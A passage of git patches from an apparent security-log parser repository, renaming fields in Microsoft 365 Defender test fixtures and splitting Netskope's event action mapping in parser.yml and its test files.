+        "InitiatingProcessTokenElevation": "TokenElevationTypeDefault",
+        "InitiatingProcessVersionInfoCompanyName": "Microsoft Corporation",
+        "InitiatingProcessVersionInfoFileDescription": "Host Process for OMA-DM Client",
+        "InitiatingProcessVersionInfoInternalFileName": "omadmclient",
+        "InitiatingProcessVersionInfoOriginalFileName": "omadmclient.exe",
+        "InitiatingProcessVersionInfoProductName": "Microsoft\u00ae Windows\u00ae Operating System",
+        "InitiatingProcessVersionInfoProductVersion": "10.0.19041.2193",
+        "PreviousRegistryKey": "HKEY_LOCAL_MACHINE\\BCD00000000\\Objects\\{a5a30fa2-3d06-4e9f-b5f4-a01df9d1fcba}\\Elements"
       },
       "type": "RegistryKeyDeleted"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
index c632ebbfa..a04e0e8be 100644
--- a/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
+++ b/Microsoft/microsoft-365-defender/tests/test_devices_events_script_content.json
@@ -16,9 +16,7 @@
     "@timestamp": "2024-10-22T15:09:47.246794Z",
     "action": {
       "properties": {
-        "process": {
-          "LogonId": "0"
-        }
+        "InitiatingProcessLogonId": "0"
       },
       "type": "ScriptContent"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_events.json b/Microsoft/microsoft-365-defender/tests/test_email_events.json
index 5f3e9f9b1..294c92d60 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_events.json
@@ -17,18 +17,16 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-          "FileSize": 14687048,
-          "LogonId": "121834210",
-          "VersionInfoCompanyName": "Google",
-          "VersionInfoFileDescription": "Software Reporter Tool",
-          "VersionInfoInternalFileName": "software_reporter_tool_exe",
-          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
-          "VersionInfoProductName": "Software Reporter Tool",
-          "VersionInfoProductVersion": "102.286.200"
-        }
+        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+        "InitiatingProcessFileSize": 14687048,
+        "InitiatingProcessLogonId": "121834210",
+        "InitiatingProcessVersionInfoCompanyName": "Google",
+        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
index 57b4e7abc..031a0b50a 100644
--- a/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
+++ b/Microsoft/microsoft-365-defender/tests/test_email_url_info.json
@@ -16,18 +16,16 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-          "FileSize": 14687048,
-          "LogonId": "121834210",
-          "VersionInfoCompanyName": "Google",
-          "VersionInfoFileDescription": "Software Reporter Tool",
-          "VersionInfoInternalFileName": "software_reporter_tool_exe",
-          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
-          "VersionInfoProductName": "Software Reporter Tool",
-          "VersionInfoProductVersion": "102.286.200"
-        }
+        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+        "InitiatingProcessFileSize": 14687048,
+        "InitiatingProcessLogonId": "121834210",
+        "InitiatingProcessVersionInfoCompanyName": "Google",
+        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
index e45140956..7d110bb54 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_directory.json
@@ -16,18 +16,16 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-          "FileSize": 14687048,
-          "LogonId": "121834210",
-          "VersionInfoCompanyName": "Google",
-          "VersionInfoFileDescription": "Software Reporter Tool",
-          "VersionInfoInternalFileName": "software_reporter_tool_exe",
-          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
-          "VersionInfoProductName": "Software Reporter Tool",
-          "VersionInfoProductVersion": "102.286.200"
-        }
+        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+        "InitiatingProcessFileSize": 14687048,
+        "InitiatingProcessLogonId": "121834210",
+        "InitiatingProcessVersionInfoCompanyName": "Google",
+        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info.json b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
index f1753e2d7..0a0174b85 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_info.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_info.json
@@ -16,18 +16,16 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-          "FileSize": 14687048,
-          "LogonId": "121834210",
-          "VersionInfoCompanyName": "Google",
-          "VersionInfoFileDescription": "Software Reporter Tool",
-          "VersionInfoInternalFileName": "software_reporter_tool_exe",
-          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
-          "VersionInfoProductName": "Software Reporter Tool",
-          "VersionInfoProductVersion": "102.286.200"
-        }
+        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+        "InitiatingProcessFileSize": 14687048,
+        "InitiatingProcessLogonId": "121834210",
+        "InitiatingProcessVersionInfoCompanyName": "Google",
+        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
index 3e55ad2b0..6077ecfdc 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon.json
@@ -16,18 +16,16 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-          "FileSize": 14687048,
-          "LogonId": "121834210",
-          "VersionInfoCompanyName": "Google",
-          "VersionInfoFileDescription": "Software Reporter Tool",
-          "VersionInfoInternalFileName": "software_reporter_tool_exe",
-          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
-          "VersionInfoProductName": "Software Reporter Tool",
-          "VersionInfoProductVersion": "102.286.200"
-        }
+        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+        "InitiatingProcessFileSize": 14687048,
+        "InitiatingProcessLogonId": "121834210",
+        "InitiatingProcessVersionInfoCompanyName": "Google",
+        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query.json b/Microsoft/microsoft-365-defender/tests/test_identity_query.json
index 55684497d..f33a1eb87 100644
--- a/Microsoft/microsoft-365-defender/tests/test_identity_query.json
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_query.json
@@ -16,18 +16,16 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-          "FileSize": 14687048,
-          "LogonId": "121834210",
-          "VersionInfoCompanyName": "Google",
-          "VersionInfoFileDescription": "Software Reporter Tool",
-          "VersionInfoInternalFileName": "software_reporter_tool_exe",
-          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
-          "VersionInfoProductName": "Software Reporter Tool",
-          "VersionInfoProductVersion": "102.286.200"
-        }
+        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+        "InitiatingProcessFileSize": 14687048,
+        "InitiatingProcessLogonId": "121834210",
+        "InitiatingProcessVersionInfoCompanyName": "Google",
+        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
index 5a6e54961..3cedbfdb3 100644
--- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json
+++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
@@ -16,18 +16,16 @@
     "@timestamp": "2022-09-01T07:09:47.498056Z",
     "action": {
       "properties": {
-        "process": {
-          "AccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
-          "CommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-          "FileSize": 14687048,
-          "LogonId": "121834210",
-          "VersionInfoCompanyName": "Google",
-          "VersionInfoFileDescription": "Software Reporter Tool",
-          "VersionInfoInternalFileName": "software_reporter_tool_exe",
-          "VersionInfoOriginalFileName": "software_reporter_tool.exe",
-          "VersionInfoProductName": "Software Reporter Tool",
-          "VersionInfoProductVersion": "102.286.200"
-        }
+        "InitiatingProcessAccountObjectId": "9d6c8861-bc27-4c1c-b5d7-aa00401d0fd2",
+        "InitiatingProcessCommandLine": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+        "InitiatingProcessFileSize": 14687048,
+        "InitiatingProcessLogonId": "121834210",
+        "InitiatingProcessVersionInfoCompanyName": "Google",
+        "InitiatingProcessVersionInfoFileDescription": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoInternalFileName": "software_reporter_tool_exe",
+        "InitiatingProcessVersionInfoOriginalFileName": "software_reporter_tool.exe",
+        "InitiatingProcessVersionInfoProductName": "Software Reporter Tool",
+        "InitiatingProcessVersionInfoProductVersion": "102.286.200"
       },
       "type": "NtAllocateVirtualMemoryApiCall"
     },
diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json
index 9304ca1cb..2f5082094 100644
--- a/Microsoft/microsoft-365-defender/tests/test_process_error.json
+++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json
@@ -22,14 +22,10 @@
     "@timestamp": "2024-09-24T14:18:11.864114Z",
     "action": {
       "properties": {
-        "LogonId": "0",
-        "process": {
-          "parent": {
-            "CommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
-            "FileSize": 11864,
-            "LogonId": "0"
-          }
-        }
+        "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+        "InitiatingProcessFileSize": 11864,
+        "InitiatingProcessLogonId": "0",
+        "LogonId": "0"
       },
       "type": "ProcessCreated"
     },

From c1d52ac1ccb3dd44390361ce5806be9a8d31570c Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?L=C3=A9na=C3=AFg?=
 <126670263+LenaigKaliou@users.noreply.github.com>
Date: Thu, 28 Nov 2024 09:40:42 +0100
Subject: [PATCH 290/317] Update Netskope/netskope_events/ingest/parser.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Co-authored-by: Sébastien Quioc <sebastien.quioc@sekoia.fr>
---
 Netskope/netskope_events/ingest/parser.yml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/Netskope/netskope_events/ingest/parser.yml b/Netskope/netskope_events/ingest/parser.yml
index 7ce3a2543..b4606f079 100644
--- a/Netskope/netskope_events/ingest/parser.yml
+++ b/Netskope/netskope_events/ingest/parser.yml
@@ -36,7 +36,8 @@ stages:
           "@timestamp": "{{parse_date.datetime}}"
           observer.vendor: "Netskope"
           event.dataset: "{{parsed_event.message.type}}"
-          event.action: "{{parsed_event.message.action or parsed_event.message.activity or 'Allow'}}"
+          event.action: "{{parsed_event.message.activity}}"
+          action.name: "{{parsed_event.message.action or 'Allow'}}"
           event.reason: "{{parsed_event.message.audit_log_event or parsed_event.message.bypass_reason}}"
           event.duration: "{{parsed_event.message.conn_duration}}"
           user_agent.original: "{{parsed_event.message.user_agent}}"

From bbb2d8c5d99a2b154a4a8aeb127d12968cbc8b97 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Thu, 28 Nov 2024 09:46:49 +0100
Subject: [PATCH 291/317] Fixing tests

---
 .../tests/test_audit_log_deleted_inline_policy.json          | 4 +++-
 .../tests/test_audit_log_edit_admin_record.json              | 4 +++-
 .../netskope_events/tests/test_audit_log_login_failed.json   | 4 +++-
 .../tests/test_audit_log_login_successful.json               | 4 +++-
 .../tests/test_audit_log_logout_successful.json              | 4 +++-
 .../tests/test_audit_log_password_change_successful.json     | 4 +++-
 Netskope/netskope_events/tests/test_connection_log.json      | 4 +++-
 Netskope/netskope_events/tests/test_dlp_incident.json        | 3 +++
 Netskope/netskope_events/tests/test_malware_alert.json       | 5 ++++-
 Netskope/netskope_events/tests/test_nspolicy_block.json      | 5 ++++-
 Netskope/netskope_events/tests/test_nspolicy_log.json        | 3 +++
 Netskope/netskope_events/tests/test_nspolicy_upload.json     | 3 +++
 Netskope/netskope_events/tests/test_user_alert.json          | 5 ++++-
 13 files changed, 42 insertions(+), 10 deletions(-)

diff --git a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
index df70ea26e..c564471d7 100644
--- a/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
+++ b/Netskope/netskope_events/tests/test_audit_log_deleted_inline_policy.json
@@ -5,7 +5,6 @@
   "expected": {
     "message": "{\n  \"timestamp\": 1651451341,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"john.doe@example.org\",\n  \"severity_level\": 2,\n  \"audit_log_event\": \"Deleted inline policy\",\n  \"supporting_data\": {\n    \"data_type\": \"policy\",\n    \"data_values\": [\n      false\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"acfa7348-64c5-40de-b28d-202c8362d0f7\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
-      "action": "Allow",
       "category": [
         "configuration"
       ],
@@ -17,6 +16,9 @@
       ]
     },
     "@timestamp": "2022-05-02T00:29:01Z",
+    "action": {
+      "name": "Allow"
+    },
     "netskope": {
       "events": {
         "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
index 10b406a5f..952e5c0b6 100644
--- a/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
+++ b/Netskope/netskope_events/tests/test_audit_log_edit_admin_record.json
@@ -5,7 +5,6 @@
   "expected": {
     "message": "{\n  \"timestamp\": 1651489787,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"john.doe@example.org\",\n  \"severity_level\": 1,\n  \"audit_log_event\": \"Edit admin record\",\n  \"supporting_data\": {\n    \"data_type\": \"admin\",\n    \"data_values\": [\n      \"admin@example.org\"\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"275a263c8f8d4b7d9e12bf65b9094116\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
-      "action": "Allow",
       "category": [
         "configuration"
       ],
@@ -17,6 +16,9 @@
       ]
     },
     "@timestamp": "2022-05-02T11:09:47Z",
+    "action": {
+      "name": "Allow"
+    },
     "netskope": {
       "events": {
         "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_login_failed.json b/Netskope/netskope_events/tests/test_audit_log_login_failed.json
index 8a792a408..05b0456e2 100644
--- a/Netskope/netskope_events/tests/test_audit_log_login_failed.json
+++ b/Netskope/netskope_events/tests/test_audit_log_login_failed.json
@@ -5,7 +5,6 @@
   "expected": {
     "message": "{\n  \"timestamp\": 1651494031,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"student13\",\n  \"severity_level\": 1,\n  \"audit_log_event\": \"Login Failed\",\n  \"supporting_data\": {\n    \"data_type\": \"user\",\n    \"data_values\": [\n      \"4.5.6.7\",\n      \"student13\"\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"student13\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"60d81a80b26149b8a910dfffc48cbf41\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
-      "action": "Allow",
       "category": [
         "authentication"
       ],
@@ -17,6 +16,9 @@
       ]
     },
     "@timestamp": "2022-05-02T12:20:31Z",
+    "action": {
+      "name": "Allow"
+    },
     "netskope": {
       "events": {
         "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_login_successful.json b/Netskope/netskope_events/tests/test_audit_log_login_successful.json
index 01549d366..cf808efde 100644
--- a/Netskope/netskope_events/tests/test_audit_log_login_successful.json
+++ b/Netskope/netskope_events/tests/test_audit_log_login_successful.json
@@ -5,7 +5,6 @@
   "expected": {
     "message": "{\n  \"timestamp\": 1671727087,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"john.doe@example.org\",\n  \"severity_level\": 2,\n  \"audit_log_event\": \"Login Successful\",\n  \"supporting_data\": {\n    \"data_type\": \"user\",\n    \"data_values\": [\n      \"1.2.3.4\",\n      \"john.doe@example.org\"\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"45b78fd638944e9ca0c6d92dfe2d4815\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
-      "action": "Allow",
       "category": [
         "authentication"
       ],
@@ -17,6 +16,9 @@
       ]
     },
     "@timestamp": "2022-12-22T16:38:07Z",
+    "action": {
+      "name": "Allow"
+    },
     "netskope": {
       "events": {
         "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json
index 12e39be95..fb06271d6 100644
--- a/Netskope/netskope_events/tests/test_audit_log_logout_successful.json
+++ b/Netskope/netskope_events/tests/test_audit_log_logout_successful.json
@@ -5,7 +5,6 @@
   "expected": {
     "message": "{\n  \"timestamp\": 1670409967,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"john.doe@example.org\",\n  \"severity_level\": 2,\n  \"audit_log_event\": \"Logout Successful\",\n  \"supporting_data\": {\n    \"data_type\": \"reason\",\n    \"data_values\": [\n      \"Logged out due to inactivity\"\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"e0272abae25442f681d0dbbef65b67e9\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
-      "action": "Allow",
       "category": [
         "authentication"
       ],
@@ -17,6 +16,9 @@
       ]
     },
     "@timestamp": "2022-12-07T10:46:07Z",
+    "action": {
+      "name": "Allow"
+    },
     "netskope": {
       "events": {
         "action": {
diff --git a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json
index a2fa885de..667c5755e 100644
--- a/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json
+++ b/Netskope/netskope_events/tests/test_audit_log_password_change_successful.json
@@ -5,7 +5,6 @@
   "expected": {
     "message": "{\n  \"timestamp\": 1651489787,\n  \"type\": \"admin_audit_logs\",\n  \"user\": \"john.doe@example.org\",\n  \"severity_level\": 1,\n  \"audit_log_event\": \"Password Change Successful\",\n  \"supporting_data\": {\n    \"data_type\": \"user\",\n    \"data_values\": [\n      \"1.2.3.4\",\n      \"admin@example.org\"\n    ]\n  },\n  \"organization_unit\": \"\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"ccl\": \"unknown\",\n  \"count\": 1,\n  \"_id\": \"47e7e59a6ffa4662be63836a0f898b16\",\n  \"userPrincipalName\": \"\",\n  \"sAMAccountName\": \"\"\n}\n",
     "event": {
-      "action": "Allow",
       "category": [
         "iam"
       ],
@@ -17,6 +16,9 @@
       ]
     },
     "@timestamp": "2022-05-02T11:09:47Z",
+    "action": {
+      "name": "Allow"
+    },
     "netskope": {
       "events": {
         "action": {
diff --git a/Netskope/netskope_events/tests/test_connection_log.json b/Netskope/netskope_events/tests/test_connection_log.json
index 5c5218356..996cd6263 100644
--- a/Netskope/netskope_events/tests/test_connection_log.json
+++ b/Netskope/netskope_events/tests/test_connection_log.json
@@ -5,7 +5,6 @@
   "expected": {
     "message": "{\n  \"_id\": \"69573873d4de0a4f1d2cbac4\",\n  \"access_method\": \"Client\",\n  \"app\": \"Swile\",\n  \"appcategory\": \"HR\",\n  \"bypass_reason\": \"SSL Do Not Decrypt Bypass Policy Matched\",\n  \"bypass_traffic\": \"yes\",\n  \"category\": \"HR\",\n  \"cci\": 16,\n  \"ccl\": \"poor\",\n  \"connection_id\": 0,\n  \"count\": 1,\n  \"domain\": \"test.example.org\",\n  \"dst_country\": \"FR\",\n  \"dst_geoip_src\": 1,\n  \"dst_latitude\": 48.85836410522461,\n  \"dst_location\": \"Paris\",\n  \"dst_longitude\": 2.294532060623169,\n  \"dst_region\": \"Ile-de-France\",\n  \"dst_timezone\": \"Europe/Paris\",\n  \"dst_zipcode\": \"N/A\",\n  \"dstip\": \"5.6.7.8\",\n  \"dstport\": 443,\n  \"netskope_pop\": \"FR-PAR1\",\n  \"organization_unit\": \"\",\n  \"other_categories\": [\n    \"Finance/Accounting\",\n    \"All Categories\",\n    \"HR\"\n  ],\n  \"page\": \"test.example.org\",\n  \"policy\": \"bypass_ssl for regulation purpose\",\n  \"request_id\": 1111111111111111111,\n  \"site\": \"Swile\",\n  \"src_country\": \"FR\",\n  \"src_geoip_src\": 2,\n  \"src_latitude\": 48.11,\n  \"src_location\": \"Rennes\",\n  \"src_longitude\": -1.6744,\n  \"src_region\": \"Brittany\",\n  \"src_time\": \"Wed Dec 21 17:12:00 2022\",\n  \"src_timezone\": \"Europe/Paris\",\n  \"src_zipcode\": \"35000\",\n  \"srcip\": \"4.5.6.7\",\n  \"ssl_decrypt_policy\": \"yes\",\n  \"timestamp\": 1671639140,\n  \"traffic_type\": \"CloudApp\",\n  \"transaction_id\": 0,\n  \"type\": \"connection\",\n  \"ur_normalized\": \"john.doe@example.org\",\n  \"url\": \"test.example.org\",\n  \"user\": \"john.doe@example.org\",\n  \"user_generated\": \"yes\",\n  \"userip\": \"1.2.3.4\",\n  \"userkey\": \"john.doe@example.org\",\n  \"org\": \"\",\n  \"http_transaction_count\": 0,\n  \"network\": \"\",\n  \"useragent\": \"\",\n  \"dsthost\": \"\",\n  \"numbytes\": 0,\n  \"CononicalName\": \"\",\n  \"os_version\": \"\",\n  \"browser_session_id\": 0,\n  \"resp_cnt\": 0,\n  \"log_file_name\": \"\",\n  \"suppression_end_time\": 0,\n  \"browser_version\": \"\",\n  \"severity\": \"\",\n  \"client_bytes\": 0,\n  \"suppression_start_time\": 0,\n  \"app_session_id\": 0,\n  \"sAMAccountName\": \"\",\n  \"req_cnt\": 0,\n  \"device\": \"\",\n  \"browser\": \"\",\n  \"userPrincipalName\": \"\",\n  \"conn_endtime\": 